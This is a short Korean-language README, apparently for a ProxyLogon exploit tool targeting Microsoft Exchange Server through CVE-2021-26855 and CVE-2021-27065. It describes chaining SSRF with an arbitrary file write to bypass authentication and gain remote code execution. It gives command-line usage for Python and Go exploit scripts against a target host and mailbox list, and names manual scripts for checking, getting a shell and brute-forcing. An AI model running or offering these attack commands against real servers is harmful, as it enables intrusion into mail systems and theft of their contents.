
Microsoft Exchange Server를 대상으로 하는 CVE-2021-26855 및 CVE-2021-27065용 익스플로잇 체인으로, SSRF 및 임의 파일 쓰기를 통해 인증 우회 및 원격 코드 실행을 가능하게 합니다.
ProxyLogon은 CVE-2021-26855의 공식적인 일반 이름으로, Microsoft Exchange Server의 취약점으로 인해 공격자가 인증을 우회하고 관리자로 가장할 수 있습니다. 또한 이 버그를 다른 사후 인증 임의 파일 쓰기 취약점인 CVE-2021-27065와 연결하여 코드 실행을 얻었습니다.
usage:
sudo python3 proxylogon.py --host=target.com [email protected]
sudo python3 proxylogon.py --host=target.com --mails=./mails.txt
usage:
go run proxylogon.go -u target.com -e [email protected]
sudo python2 /manual/check.py
sudo python2 /manual/shell.py
sudo python2 /manual/brute.py